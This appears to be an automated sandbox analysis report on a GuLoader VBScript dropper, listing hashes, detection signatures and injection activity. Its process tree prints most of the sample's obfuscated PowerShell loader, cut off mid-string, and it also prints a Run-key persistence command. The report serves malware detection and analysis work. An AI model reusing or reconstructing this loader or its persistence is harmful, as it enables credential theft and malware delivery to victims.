Analysis
-
max time kernel
299s -
max time network
303s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
16-01-2023 10:23
Static task
static1
Behavioral task
behavioral1
Sample
prof.vbs
Resource
win10-20220812-en
Behavioral task
behavioral2
Sample
prof.vbs
Resource
win7-20220812-en
General
-
Target
prof.vbs
-
Size
193KB
-
MD5
7b458417e456edfb8816b9f063dd7f4a
-
SHA1
c42d1ff212085b0bd1a150b1e4e0cca2d7cf0dfb
-
SHA256
097eb0cafefed7ddcab95345b850b7f8fa2ba518068275225d9b6a313e1f3491
-
SHA512
da58b88ee2a7af27061808331f9fd2d14bf8cb6cc94099f7b7effecfd376e7d6a577d475ac04b0c4ce38417a8110daa9d7e63851da1223d343b4c6701e51782b
-
SSDEEP
6144:9vsgtPU635A3VxHwQA4hCLx4kjjrPEZp95g+Z/TugoVD9EwM8YmhCXo+v9kaRKZv:B9v35ElxXhCLxdPP8/6
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/1460-97-0x0000000000400000-0x0000000000457000-memory.dmp MailPassView behavioral2/memory/1460-98-0x0000000000400000-0x0000000000457000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/680-95-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Nirsoft 4 IoCs
Processes:
resource yara_rule behavioral2/memory/760-94-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/680-95-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/1460-97-0x0000000000400000-0x0000000000457000-memory.dmp Nirsoft behavioral2/memory/1460-98-0x0000000000400000-0x0000000000457000-memory.dmp Nirsoft -
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
Processes:
powershell.exeieinstal.exedescription ioc process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe ieinstal.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
ieinstal.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts ieinstal.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
ieinstal.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run ieinstal.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ungkarlelejlighedernes = "%SaltoQ% -w 1 $Projektgtr=(Get-ItemProperty -Path 'HKCU:\\SOFTWARE\\AppDataLow\\').Fagintegreret;%SaltoQ% ($Projektgtr)" ieinstal.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
ieinstal.exepid process 1480 ieinstal.exe 1480 ieinstal.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exeieinstal.exepid process 1136 powershell.exe 1480 ieinstal.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exeieinstal.exedescription pid process target process PID 1136 set thread context of 1480 1136 powershell.exe ieinstal.exe PID 1480 set thread context of 680 1480 ieinstal.exe ieinstal.exe PID 1480 set thread context of 1460 1480 ieinstal.exe ieinstal.exe PID 1480 set thread context of 760 1480 ieinstal.exe ieinstal.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exeieinstal.exepid process 948 powershell.exe 1136 powershell.exe 680 ieinstal.exe 680 ieinstal.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
powershell.exeieinstal.exepid process 1136 powershell.exe 1480 ieinstal.exe 1480 ieinstal.exe 1480 ieinstal.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exeieinstal.exedescription pid process Token: SeDebugPrivilege 948 powershell.exe Token: SeDebugPrivilege 1136 powershell.exe Token: SeDebugPrivilege 760 ieinstal.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
ieinstal.exepid process 1480 ieinstal.exe -
Suspicious use of WriteProcessMemory 39 IoCs
Processes:
WScript.exepowershell.exepowershell.exeieinstal.exedescription pid process target process PID 900 wrote to memory of 948 900 WScript.exe powershell.exe PID 900 wrote to memory of 948 900 WScript.exe powershell.exe PID 900 wrote to memory of 948 900 WScript.exe powershell.exe PID 948 wrote to memory of 1136 948 powershell.exe powershell.exe PID 948 wrote to memory of 1136 948 powershell.exe powershell.exe PID 948 wrote to memory of 1136 948 powershell.exe powershell.exe PID 948 wrote to memory of 1136 948 powershell.exe powershell.exe PID 1136 wrote to memory of 1480 1136 powershell.exe ieinstal.exe PID 1136 wrote to memory of 1480 1136 powershell.exe ieinstal.exe PID 1136 wrote to memory of 1480 1136 powershell.exe ieinstal.exe PID 1136 wrote to memory of 1480 1136 powershell.exe ieinstal.exe PID 1136 wrote to memory of 1480 1136 powershell.exe ieinstal.exe PID 1136 wrote to memory of 1480 1136 powershell.exe ieinstal.exe PID 1136 wrote to memory of 1480 1136 powershell.exe ieinstal.exe PID 1136 wrote to memory of 1480 1136 powershell.exe ieinstal.exe PID 1480 wrote to memory of 680 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 680 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 680 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 680 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 680 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 680 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 680 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 680 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 1460 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 1460 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 1460 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 1460 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 1460 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 1460 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 1460 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 1460 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 760 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 760 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 760 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 760 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 760 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 760 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 760 1480 ieinstal.exe ieinstal.exe PID 1480 wrote to memory of 760 1480 ieinstal.exe ieinstal.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\prof.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:900 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sye = """SpiFSkiuFlanLaccBoyttiliAnaoBranMik sljHPreTBrsBWoo Car{Mar Sul Bra Sol CompCelaIndrTryaIntmSni(For[SagSStotLugrDomiGamnEspgunc]Avi<BlaVsirsSosmhaycGru8Oct9Stv)Bra;Tin Del Stu Lic Raa<FinCFriaFilpHanrOphyGudlAfryOoglBlo Odo=Fas GlaNindeStiwOpf-EnaOstrbOvejPenePelcSubtBro HysbAnayGaltIndeDis[Bre]Mec Per(Bea<BemVMytsHvimFlacVel8ove9Mas.TriLMelereanRosgSuptArrhBes Ant/Ove Sig2Sma)Aut;Tow Kro Gen Ind MelFDisoHarrGow(Com<TekESubrKanhMagvBlgeKoprAlkvTrosAstgRenrHylumilpPolpUnaePrerOpp=Met0Int;Ude Apn<UvaEBurrRelhAnnvBebefesrTonvVolsSlegSemrJenuMulpVarpMeseNonrCoa Ded-FeelVictDyb Min<MadVVegsUndmTrfcOmr8bug9Bai.pseLRadelnpnBndgPoltWarhEva;For fem<PylELabrBoghFyrvAceeDetrJorvdissMisgAngrPreuAanpGropMiseEffrbrn+wis=Pho2Civ)Pos{Tit Sou Sub Ren Sol udd Fib Gau Ext<EftCCoraHt pnaurPooyIrolSlyyCrelSac[And<hviETrirNephisovAtheDrirailvSeisBargBjrrPseuMarpAccpKuleHerrDel/Sud2Ani]Unp Und=Str Bri[CencStaoDamnBoavForeVerrMadtFac]Occ:Vir:BirTDitoUfuBFolySortEyeeJur(For<BilVAdmsanomHarcmar8Uma9Dur.UnrSUnauMitbmansEnttBrorSupiCrunBukgDra(Dev<AttEcoprDivhBehvBoneSpirSeqvAspsMesgleerGoluKappCoepKedeAfsrBac,Por Ath2Lid)For,Sup Kla1Daa6bjl)Ste;Pho Ove Pis<UdsCRovaVugpEldrelsyokslregyUnhlUnw[Tro<NikEGolrLejhTaxvSumeCourUdkvOutssupgSlurStruStopTaspOxteEthrDis/Ups2vit]Sus Stu=Tra Sam(Run<ForCAngaPaapNonrKosyMarlCroyDeplApt[Stk<SlaEflerSubhVgtvSamePyrrEjavPerstilgDesrDewuOmspPenpBeseColrSam/Kaf2Clu]ege man-CyrbChaxDyroBisrHov Unw6Unf9Pia)Mor;Cha Dek Pom acc Pho}Mis Ind[MorSClotCenrFreiEnfnTopgEck]For[LaySjacyDissGastSkaeHjemBre.ExpTFabeConxAndtfuk.AviEMalnTrecFanoBlodBesiStanUnsgSty]mas:Beh:TaaALseSGenCaffISigIVel.FloGMuleRisthyrSFlotSterSeriAutnChegKom(Sui<JanCEllaCripNevrGawyNonlSynyOlilutu)blo;Fem}Bro<ArbSArgyhernLivdUneeZinfTrouSpjlEledRuseUnssKlitRok0Ant=BenHEmbTFraBSid Lig'Run1Hyp6Eve3LapCSig3Cym6Per3Dob1Tra2Ind0Drt2Neu8Bio6craBArt2Pla1Fok2Who9Syn2Anx9Ind'Pre;Den<ResSSynyInsnAffdSpieGrafFoduAvolTekdHjeePlesDistLin1Til=RetHMerTEntBUna Tib'Vin0Lag8Bew2ChaCLen2sym6var3Cau7Fub2RapAMec3For6Ork2NorAStr2stu3Afd3hen1Uma6ConBArm1Spr2hou2StrCPho2DekBInf7Lap6Fro7Hor7Und6PreBCas1Arg0Ind2VidBKam3Fru6anl2For4Chu2Qat3Cli2Sni0Kon0resBVes2Pac4Kor3For1Hov2SnyCUsi3Daa3Aca2Saf0Opm0Vam8Gaa2Sun0For3Spl1For2SorDPhy2SvaARin2Phi1En 3Raa6Afl'hyp;Rit<ophSPugyMomnAnndStjeKaufTetuPselHitdJageFabsHattUdg2Rho=RegHIntTbatBTry Hre'ret0hng2Moo2Iod0Abo3Non1Mis1Uaf5Shr3Pen7Sno2ForAShi2Fug6Tra0Tra4Dif2Cos1Ryk2Sha1Chi3Inv7End2Ufr0Pro3Irr6Bre3Fem6par'Spo;Kvi<AreSNatyStunInddBloeProfPreuDrnlNondMuseBeksSkktSee3Skj=PraHSamTLeuBRea Aet'Hin1Ska6Bik3ShoCInt3Eve6Elm3Fri1Ele2Fje0kry2mis8Cli6MelBTil1Wea7Rai3Fin0Asy2FocBSpo3Per1Tra2PagCFor2Sam8skk2Fno0sta6FraBGir0EroCStu2DraBSmr3Jun1End2Tuk0Tri3Eks7Nor2nonAWhi3Erh5Gaz1For6fac2Men0Bet3Qua7Mid3Nee3Dod2OxiCHet2Adv6Sie2Dep0Lan3Fat6Neo6TitBFil0CanDDes2Bed4Rou2rebBFor2Mar1epi2Blo9For2Fle0Bas1Glo7Lat2Laz0ndt2Ter3Ung'Bin;Cyk<StiSTabyFornFlodtareAfsfUdkuAuslPegdPoueZoosPhytEtp4Trs=ChlHDrfTsamBAlb Efo'Rha3Gra6Teg3Rep1Bef3Gle7cal2FovCStb2GalBTil2Fyl2Mus'Cha;Int<UnsSKlaySadnOmgdLigeBehfHazuConlGhadTaueTrosOpbtSki5Ska=TroHKonTUncBBes Sva'Net0Jaz2Cod2Poe0Aad3Nyo1Uom0Ant8Cla2MisAPro2Sor1Lys3Bun0Vel2Wer9Emb2Sur0Con0FlsDPla2Non4Chu2RenBBev2Par1Bra2Tur9Bal2Dis0Una'Kat;Snu<SdmSSenyHetnDisdDaneHemfForudevlLivdforeSubsBeltShe6Byg=SprHIndTHjfBsat suf'Chr1kan7Aff1Sco1Kop1Ake6Bew3Spi5Aft2Kil0Cut2Bl 6Osi2ComCDiv2Dks4Sme2Nud9Sna0FasBUnc2Cri4Age2Spu8Dul2Kon0Flu6Eks9Has6Unv5Uni0DelDOut2UdrCDis2Dei1Blr2Wol0Bor0Ark7Kon3FraCOve1Hul6Flo2SupCSte2Kar2bre6Mar9Sre6abr5Kal1Bli5Wed3Lge0Kal2Rei7Ope2Apo9Ska2GdsCKra2Bon6Spa'Vod;Dju<PreSUnpyEjnnStrdStaeSnafOpruelelSumdCloeNonsomvtBlo7Tho=PalHKraTPerBTil Sup'Spa1Blo7Pie3Amb0Kri2MonBBri3Bar1Ran2ThrCAta2Lnk8Sor2Tax0Mis6For9Eks6bss5met0Omk8Ind2Ops4For2PorBNon2Tus4Lam2ung2Ord2Col0Jac2Joi1For'Rus;For<AtlSBrdyDjinFladMaleAspfHetuSkrlDamdChieForsTiltGlo8Dob=ComHEleTTheBWag Sva'als1Sea7Ves2Blr0Twi2Kol3Tra2Dus9out2Int0Lab2Adl6Ina3Hov1Jor2Tek0Aft2Saf1Fag0Bes1sup2Gev0Sel2Vir9Une2Udg0Uni2Tmm2Ryn2urn4Uds3Opt1Spi2Unp0Dec'Hos;var<kluSSyvyImpnNyvdUngeStafRenuUndlEdedHedeRessLuftEmm9Til=SalHSolTCulBinc Udt'Par0PisCSip2IntBDai0Baa8Amn2For0Kla2Ter8Res2ResAOms3Ene7sal3CosCCre0Met8Ove2MitASat2Anl1Kap3Hyp0Tim2For9Ten2Dif0Tap'Acr;Dek<FriEhomnNonsMednSolabonrKuwlSupeCasdKri0Gru=GraHSkaTEftBCom Bio'Tab0Opp8qua3OpfCPre0Sal1Hje2Int0Rec2San9Aab2Fis0Puc2Vol2Ant2Slg4Dem3Vid1Phl2Fra0Lin1Vie1The3ActCInt3Fla5Agg2For0Uds'Kul;Ret<IntEAflnAlfsFlunKliaaanrGailVraeFaldArb1Sca=PreHGreTCacBTil Fod'Afv0Ele6Par2Tro9Akk2Dam4Ais3Stu6Gry3Int6Ref6usk9Div6Non5Stu1Vou5Gon3Ove0Sir2Tha7Nig2pne9Edd2wreCDra2Pay6Sna6Rec9Ogh6Arb5Non1Dog6Den2Sky0Adr2Akt4Byg2occ9Std2Gro0bev2Unp1Til6Lej9Lib6Aho5Skr0Typ4Chl2BarBLok3Cal6Bur2DayCSun0Ten6Eri2Gon9Hop2Sly4Jor3Til6Sod3Fir6Sol6Ano9Ent6Gte5Trf0Scu4Ove3Res0Men3Bea1Par2TerAOve0Mok6Ust2Mar9sto2Udf4Que3Ban6Udp3Res6hje'Unc;Hed<FreEKonnPsysAcenMenaAdorSamlDaneUnddImd2Ngs=AchHMulTHjuBMin Sti'Bru0RamCChe2EleBLok3Spe3Col2VanAfds2HotERef2Bes0Mah'Ans;Sup<fjaEPhynKamsJugnVataCoarTaalSnneFoldInv3Beg=HavHSpeTIndBAbs For'Far1Fer5Tec3Fen0Dis2liz7Eva2Udl9Afs2GloCSch2Trs6pol6Bri9Arv6smi5Ear0OpeDflo2AdoCFor2Mal1Fod2Sam0Tve0Zoo7Pre3FecCDel1Arb6Boi2nonCHyd2Bad2Var6Mea9Tol6Non5Gas0MooBInd2Col0Tid3Kra2Kan1Bro6Meg2Son9Fak2HorATha3Und1Kli6Bkk9Afs6Bez5Kam1Jor3Rev2ProCove3Mey7Bag3Men1Tul3thr0Emu2Fje4Fri2Sol9Iso'Wat;cig<CivETjenAbsspasnhemaAmprMedlUdseEgldBer4Mes=BraHKliTBasBSkr Lkk'Naa1Ple3Kik2LydCfil3Lop7Unc3Udy1all3Red0Omp2Sus4Cly2Fri9Dow0Pap4Boo2tud9Syn2Sce9Met2BjeAcli2Upr6San'Dyb;Dec<LanEunpnFilsGodnRepaSyrrUndlVereFordSar5Acr=AenHUdeTWafBbes Ree'Bim2EmbBUna3Fug1Squ2Sgr1Unj2Fry9Exo2Ada9Eks'Ban;Cym<LinEWatnlansFranLomaEllrRehlNoneSvadHau6For=begHDemTgluBTap Kig'Mar0MouBUha3Myo1pot1Emp5Con3Wro7Ala2FikAInl3Mor1Out2pet0Kol2Tra6Und3Esc1Dis1Syg3til2KabCUnr3Skj7imm3Cho1Uds3Dis0Sen2Kir4Inv2Fog9Dep0Bil8arc2Und0bur2Tru8Pur2IdiAprs3Hoa7Ber3HypCFor'Aad;Pre<SkaEErcnGrusFornPriaSchrEkslEtaeMejdOct7Ari=FraHBadTHjeBHor Ops'For0Pg Copr0Has0Gas1AntDScu'Udr;Fif<sanEPernNitspapnYueaExprByrlInceEdidOra8Grf=RebHfisTTreBYeo Ant'Fly1Fri9Mer'Var;FalSNedeDostLac-SunAStilRusiDepaUdhsHom Pro-DeknPteaChemComewis LokESprnprosTranObtaTherAnnlReieunddMem9Def Mes-EpovSylaSadlAkuuLrrepra Unc<onfEUranMissintnPelaopsrOpmlappeKnodred7Sju;FryfAfsuLewnCrecPretRaciFreoFolnOut subfenckJorpnyv gim{KulPNonaSalrBreaLiomKar Agt(Clo<KolSSugtunjrComiHeadGrusArtsErikOxirFodindrfSubtMiseKonrDjanUdfeRaz,Une Imp<ArbAHednMeseIndsMontblihHydaOpleGylsTariBaraTre)Ocu For Fid Aff Dig Zil;Tve<brkUSamnPendVaneNatrChrfSparCinawhinBitkSyneCosrskbiTilnChegReeetotrUbenOveeAnasEks0Fem Abo=BugHNieTStyBRee Red'Mar6Soa1Hor0Nor4Epi2Unl3Var3Hel3Mer2RhiCMon3For6Ebu3Pri1Por2Lad0Ind3Pre6tol6Con5For7Anf8Non6pro5Bas6FreDSta1ChiESyn0Den4Dis3hje5Dor3pla5Lan0End1Roi2HjeASla2Str8Tra2Sko4Dat2BonCHem2InsBRat1Dac8Flu7OpmFUdl7DiaFBel0Ked6Tse3Ass0Bac3chr7Ant3Rec7Pud2Ink0For2BilBUte3Hld1Pro0Afk1Spa2speADro2Amp8Flj2Aut4Ind2UngCSst2ScaBIsn6LodBArr0Far2Arm2Ple0Und3Sub1For0Lil4Nif3Gum6Tra3Oph6Pos2Tem0Aml2Sat8Pan2Kal7Hal2Bem9Rul2LysCaot2Inc0Kar3tel6Top6UndDLin6HerCTra6ebo5skl3Neb9Tro6Sub5Fcc1Leu2Tee2BlaDFor2Ost0nin3Ifr7Reh2Kva0Zym6var8Bkk0FloAEst2Ind7Tam2SmeFosc2Con0Win2Hag6Ani3Pat1Com6Brd5Aff3NisENag6Mad5Kon6Van1Gld1EndAMbu6DenBCra0Bes2Sem2Hov9Ser2YdeAKir2Dea7Uds2Tub4Daa2Vag9Ope0Apo4Inv3Udb6Nor3Bri6Saa2Klo0Eks2Dag8Tuc2Jor7Unw2Sve9Umu3TarCIns0Afs6Unc2Pal4oom2Sve6Une2RegDSwi2Uns0Emu6Fam5Bje6Sch8Ins0Sor4Tra2GodBUdo2Gam1For6Mop5Met6Opr1Tyv1ForABes6ConBFor0Stk9Sub2SpaAskv2Bun6wol2Lax4Fli3Het1Baz2ParCSce2StaAEle2NixBSja6GauBBef1For6Com3skr5Tem2Ina9Kar2VenCEle3Hoo1Smr6BouDGra6Swe1Boo0Gum0Reg2MelBpro3Mil6par2driBTek2Udl4Ndl3Ops7Ind2Res9Str2Eut0Men2Des1Lap7ManDOut6AstCDoo1OrtEBek6Soc8Gen7Cya4Fis1Mas8Zoo6MlkBFor0Tra0Sib3dem4nor3Gaz0Ala2Fla4Tar2Eva9ken3Fol6Bro6AseDLat6Sku1Sub1pyr6Sin3AnaCSve2RetBSva2Hut1Fos2Bet0Ana2Pre3Tob3Tjs0Avo2Bla9Sle2Ser1Isi2Lab0For3buc6Fla3Ele1Sig7Nod5Wik6bisCAnt6Ove5Fre3Dik8Sad6CleCrap6CanBzar0Kas2Gla2Gen0Sla3Mis1Dus1Pre1Sam3UnhCDrn3Thi5Bil2Mor0Jrg6WeiDUns6Com1Bra1Art6Reg3SprCCap2ForBCou2Lau1Pin2Fut0Omv2Rep3bas3Haa0Ste2Squ9Ove2Van1pra2Ger0Per3Dut6Yuc3Tid1Pan7jap4Sim6AfsCPar'Sna;UncErocnSpisPornRetaUdgrImdlTraedefdUps9Eva Dec<TraULutnFordEfteGiarConfHetrForaSurnUnhkPjaeforrBoriAgenHypgOlieEksrDionValeBersWor0Str;Abb<SejUPronTyldBygeDisrPolfNonrDrmaBranOttkinfeInorAndibdenBisgPoleNeorQuinCrieHunsUnd5Ele Avi=sig BegHRadTRavBvir Anf'ert6Inc1Jen0Ugl4Kan2Bag9Pre2Mis6Tag2sliAAis2EngDCac2SenAPho2War9Squ2BraAUds2cos8cha2Sem0Tra3Fre1Ver2Ged0Ove3Jow7Epi3Feu6Luf6Sta5Cat7Bom8Kvi6Bus5Asp6Slu1Non0Ree4Bom2Unp3Und3Arb3Eft2SteCFle3Tub6Wom3Ven1out2Nib0Lys3Run6Inf6HalBKom0Cre2Orb2See0Tas3Whi1Maa0Fre8Sti2Del0Inv3Pye1Art2IndDEth2CliAUnd2Wat1Gen6ElyDTod6Klv1Ant1Iso6Cha3BefCByg2HypBPej2gne1Int2Bde0Plu2Cha3Bio3Sto0fal2Cor9Com2Spl1leg2Civ0Sol3Ste6for3Psy1lim7Ama7Mat6Ste9Mit6Fly5Mun1FilEmug1Trs1Man3SpiCBil3Ree5Can2Amo0Blu1AntEWin1spi8Lit1fes8Gen6Uds5Stt0Mil5Val6FibDSam6Deb1kom1pad6Ord3BanCHer2KlaBReg2Ove1alp2Con0Unm2mul3Yrk3Bul0Asp2Maz9end2Fra1Und2Pre0Hat3dam6Iag3Aer1Cod7Eth6Kol6Anv9Sta6Pos5Art6Und1Afh1Syn6Saf3BolCOut2ChaBOve2Sam1Gen2Tie0Imi2Gun3ind3Gil0Brs2Mas9Bre2Hal1Dom2Eun0Dol3God6Mag3Soc1Lob7Arg1Sge6UndCPar6SmoCTrk'Pre;BlaERetnBorsOblnSkraKalralalTameBridHde9Blo Tia<OrdUNarnOgadFideKharPhofAcarDiaaMesnBlikVieeTrarHagiCranNongComeWawrRepnSubeExtsSof5Ube;San<pleUBapnSkydedseGurrThrfSubrMelaRoenReokHobeGasrChiiAlmnStigTameIncrTirnNoneSybsTid1Bas Mil=Har FjeHTolTSynBMig Opm'Tor3Ove7Boy2For0Ind3Gar1Kon3Spy0Und3Sve7Ske2GopBsep6Blo5Art6Don1Ove0Alk4Mas2Den9Oxe2uns6Sol2OplATmr2AciDRen2LerABuf2Lyn9Fre2exsAPre2Wak8Tra2Pun0Vul3Hje1Mon2Ren0Ast3Tol7Hus3Con6ove6SinBHje0TimCFod2islBSil3For3Cle2DesATup2MimEBlu2All0Til6MutDSge6Ful1Bib2parBSto3Try0Bra2Sto9Afr2Pre9App6Whi9Lba6Udv5Und0Mer5sal6PaaDBal1KopEPro1Kib6Cha3StaCfor3Eth6Eth3Ind1Lej2Lan0Zek2Sti8Und6FemBIls1Ope7Fas3Unp0Eje2EksBatm3Sen1Kiv2OasCSpe2Pen8Ove2Hyp0Lam6SdkBGra0flyCTel2geoBAnt3Res1hus2Ond0Bio3Kod7Fal2RomAGen3spy5Und1Var6Tam2Spr0Nam3Pro7lys3Afh3Ace2PreCKvi2vol6Myr2Con0Maa3Scr6Van6SidBSta0HerDMal2Rep4Esk2MinBRum2til1Ref2Cor9geo2Val0Gen1Nvn7skg2Dwa0For2Kal3Thr1Swa8tjr6SonDStu0RntBSvb2out0Rei3Met2Fla6Num8Org0skdASqu2Sta7Hom2HavFPan2hol0Ele2Mor6Pap3Sma1uns6Gam5Bil1Cra6Den3BodCUdr3Rem6Per3Vaa1Dag2Afk0Kid2Mil8Pre6ChoBKra1Bre7bur3nat0Far2NonBEmi3Spr1Bef2KafCKas2Don8Rai2For0Cos6FloBErr0WagCHiv2IreBUns3Ata1Sta2Udp0Gel3cor7Man2LykARef3Hex5Cho1Unc6Nar2Het0Mis3Car7Lng3San3Apo2merCqua2Leo6Log2Sec0mon3nri6del6SlaBSoo0UnfDEch2Waf4Uba2KarBUds2Vks1Tri2Fik9ufo2car0Ram1Sec7Tot2ago0Ben2Emp3Aut6AlpDFor6KdeDKli0SpoBReu2Tra0ata3cou2Myx6Uds8Eur0MerAIng2Lbe7Lic2HylFOve2Bog0Ban2mis6Ove3Mod1til6Kly5Und0EcuCHet2StoBKos3Han1Pri1Spo5Ale3Und1Obd3Ive7Pee6UncCFej6Mon9Pur6Reg5Adr6ChaDUnd6Par1Ang0Lap4Tri2San3Ama3Jae3Out2hreCArk3Und6ern3Lsr1Opk2Cus0Bor3Sin6Rub6gloBLoy0Int2Fri2Mot0Ops3Kyl1Pos0Epi8Nan2Bef0brn3Sam1Vra2KarDmed2DieASyn2van1Tid6CalDPhy6Spo1Mel1Sys6Noc3UnlCSix2PraBMrk2Con1Sub2Cos0Hou2Oxy3Gre3Yvo0Ref2Zap9Eks2Fis1hel2sof0Gib3Lyd6Uds3Pri1Pea7Bli0Str6CocCPre6DriCGar6AmpBUhv0AttCRin2PreBTra3Ska3Has2TakAKau2TysEPra2baj0Cog6ForDMed6Fld1akt2DelBMec3Ust0Dif2col9Jor2Mal9Bio6Ind9Fra6Dat5Con0Man5Top6totDMus6cha1Ste1len6sti3Bog1Dus3Dis7Unp2JagCPig2Ret1Ott3Acr6Til3Res6Tra2BroEDet3Coo7Acc2VinCAlt2Dea3Bac3Dis1Aff2Bly0Kno3Ssy7alk2hatBSma2Ama0Tek6DocCBag6HaiCNon6tylCIta6ImpCAlm6Age9Res6Unf5Str6Ele1Val0App4Kap2UntBPar2Baj0Sti3Ili6Ide3Eks1off2KasDsma2Unw4Chr2Int0Div3Ska6Opb2BetCstj2Ter4Exe6ScaCPro6VelCAng'Mar;GooETrenApasTelnWenaScrrFonlAmaeHjadvra9Skr Dec<AllUUndnsopdmoneGlerMaifSkorTriaPatnPrgkStreunerGotiTipnAnogReneKorrUannSkeeAntsMed1Hum;Pej}EldfBriuAbhnDuxcFortEonineioFunnWat DriGHaaDSupTEks For{smoPDagaHegrVaeaSagmMis Lit(Fjo[JudPWobaAnfrLimaKrimUnpeVgttSkdeStrrSek(DecPforoNecsKneiUnstAnsiViloSilneks Tra=Sna Dag0Bie,Ext KomMProaLannsopdFljaWigtUptoGrorOrgySpi Udr=ove San<KalTSterExouTrieNan)Enk]Sko Sel[SodTPreyhjepToteMis[Jom]Byg]Tri Set<BonJDecuCaflpeneBenfRomeHypsSejtTugegabnUnisPre,cas[unwPAlvaScerunjaCedmOrdeGuntNateSprrCop(EpiPUnfoTeksoveiSubtSaliNetoHypnSal Baf=und Bos1Eri)Dep]Sky Brs[bejTCouyFlepCabeAbe]Urt Kat<AgrbBibeproaJalgEnslSaneBel Kbs=Nar hem[ForVIndoHjhiPrsdPai]Kli)Eum;Sup<lonUParnPladPsyeBerrNssfAmtrSilaArcnEnfkMedebudrAtoiColnophgStoeBonrPrenPageOrisAfl2Zep Heb=Sam OutHEnaTCasBFam Hyp'Kur6Fld1Ind0Ska2Kin3Mas0Bat2Kal9Pol2Aro1Spi3Dis3Par3For7Tvi2San1Alk2ScaCbac2Ang0Ant2SonBGri3Bur6Kle6For5Pav7vlg8Cat6byg5Vir1OutEHel0Gip4Bag3Pla5Geo3Eft5att0Mal1Ann2SlaANgl2Ind8Fon2Obs4Unw2NonCApo2UnoBcir1Cle8Exx7ExtFJom7SkmFTon0Val6Est3Udl0Fej3Leu7Bru3Den7For2Bas0Des2PreBMis3mis1enk0Big1Rap2supAUns2Und8Ros2Bil4Hjn2HerCBan2SkiBMid6ChrBSnv0Tur1Sta2all0bun2Tri3Pit2AfsCCab2FotBLay2Adm0Pro0Sul1Dyn3PreCWho2GreBTor2Bas4Gad2Hyl8Uet2KvaCKln2Hum6Afs0Una4Eng3Syg6Kaa3sul6Pin2Sig0Unr2tur8Car2Ret7Tro2Skd9Urh3KipCSme6OmgDGoa6BaiDBem0AcrBInt2Aft0Gaa3Bom2Nit6Soc8Pre0BrnAAcr2Tri7Sno2OpsFRel2Lac0Gon2Dra6Qua3Gal1Eli6Tvr5Hud1dua6For3BerCNon3Sel6Hel3Mal1Ans2Loc0Aks2Hoc8Car6UnsBMug1vil7For2Unl0Bor2uds3Chi2Evu9Spa2Uri0Dip2Asp6Ide3Sal1Pea2TegCBru2OveADis2KlaBKld6ChaBLeg0Pal4Fou3Per6pyr3Coo6Mar2Tyk0arv2Ove8Sta2Haa7Acc2Tor9Rol3hviCCyr0LanBInt2Meg4Maa2Jub8Dat2For0Ver6driDSam6Ura1Mid1Tap6Non3RetCHel2AxiBAmo2Ban1Lia2The0jaz2Fal3Eks3Tvi0Ret2The9Tel2far1Spe2Spl0Kon3Bra6Pre3Fer1Jun7DisDRap6UnfCOhm6SubCHus6Adv9Bar6Bun5Ned1LgnEOve1Par6Aff3Uns